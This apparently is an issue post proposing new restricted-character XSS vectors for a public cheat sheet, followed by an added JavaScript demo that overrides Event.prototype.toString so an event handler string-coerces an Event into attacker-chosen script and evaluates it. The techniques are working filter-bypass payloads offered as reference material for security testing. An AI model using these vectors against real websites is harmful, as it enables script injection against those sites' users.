I'd like to propose the addition of a few new vectors to the Restricted Characters section of the XSS cheat sheet, specifically ones utilizing various JavaScript event handlers that require no user interaction.
The tables below showcase several JavaScript event handlers that can be fired using a restricted set of characters and require no user interaction. Additionally, they demonstrate how these event handlers can be used to achieve arbitrary JavaScript execution by overriding the Event object's inherited toString function, using two different methods.
The first method uses arrow functions (requires a `>` character), e.g. `Event.prototype.toString=x=>'x'` results in `x`.
The second method, inspired by @terjanq, overwrites the Event object's toString function with the toString function of another object that has writable and reflected properties (the `name`/`message` properties for any of the Error objects, and the `flags`/`source` properties for the Regex object, as shown in @terjanq's post).
Regex object example: `Event.prototype.toString=/x/.toString;Event.prototype.flags='x';Event.prototype.source='x'` results in `/x/x`
Error object example: `Event.prototype.toString=Error.prototype.toString;Event.prototype.message='x';Event.prototype.name='x'` results in `x: x`
Additionally, I noticed that this vector, which utilizes the onerror event handler and doesn't require a `throw` statement, is missing from the cheat sheet; I think it might be worth adding as well.
EDIT:
In hindsight, for the non-onerror events I think it'd probably make more sense to only include the `Error`, `DOMException` and `Regex` objects and the arrow function in the cheat sheet, as they are the only uniquely worded ones, and it seems like some of the other Error objects aren't supported on Safari/Chromium on mobile.
Thank you. ❤️
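The following is an added example, not code from the issue above or from the cheat sheet. It implements the three `Event.prototype.toString` overrides the issue describes (arrow function, borrowed `RegExp.prototype.toString`, borrowed `Error.prototype.toString`) and then dispatches an Event to a listener that hands it to a string-coercing sink, so the attacker-chosen string is what gets evaluated. The `Function` constructor is used as a stand-in for a browser sink such as the legacy string form of `setTimeout`; the function names and the fallback classes for runtimes without a global `Event`/`EventTarget` are this example's own, and the `6*7` payload is constructed for the demo.

```javascript
// Added example (not from the issue or the cheat sheet). Runs in a browser and
// in Node >= 15, which expose global Event and EventTarget; the fallback
// classes below only exist so the example still runs on older runtimes.
const EventCtor = globalThis.Event ?? class { constructor(type) { this.type = type; } };
const TargetCtor = globalThis.EventTarget ?? class {
  addEventListener(type, fn) { this.listeners = this.listeners || {}; this.listeners[type] = fn; }
  dispatchEvent(ev) { this.listeners[ev.type](ev); return true; }
};

// Method 1: arrow function. Needs the `>` character in the payload.
function arrowOverride(payload) {
  EventCtor.prototype.toString = x => payload;
}

// Method 2a: borrow RegExp.prototype.toString. It is generic and returns
// '/' + this.source + '/' + this.flags, so properties set on Event.prototype
// are reflected straight into the coerced string.
function regexOverride(source, flags) {
  EventCtor.prototype.toString = /x/.toString;
  EventCtor.prototype.source = source;
  EventCtor.prototype.flags = flags;
}

// Method 2b: borrow Error.prototype.toString. It returns name + ': ' + message,
// or only the non-empty one when name or message is the empty string, which
// is what lets the ': ' separator be dropped.
function errorOverride(name, message) {
  EventCtor.prototype.toString = Error.prototype.toString;
  EventCtor.prototype.name = name;
  EventCtor.prototype.message = message;
}

// What a handler sees when it string-coerces the Event it was handed.
function coercedEvent() {
  return String(new EventCtor('load'));
}

// Dispatch a (here synthetic) load event to a listener that passes the Event
// object into a string-coercing sink. Function(...) stands in for a browser
// sink like setTimeout(string); the 'return ' prefix is only there so the
// evaluated value can be inspected instead of discarded.
function dispatchIntoSink() {
  const target = new TargetCtor();
  let result;
  target.addEventListener('load', ev => { result = Function('return ' + ev)(); });
  target.dispatchEvent(new EventCtor('load'));
  return result;
}

// Demo: with an empty name, Error.prototype.toString yields just the message,
// so the Event coerces to the bare payload and the sink evaluates it.
errorOverride('', '6*7');
console.log(coercedEvent());      // 6*7
console.log(dispatchIntoSink());  // 42
```

Because the override lives on `Event.prototype`, every Event created afterwards coerces to the attacker's string, so the handler itself needs none of the restricted characters; only the one-time prototype setup does.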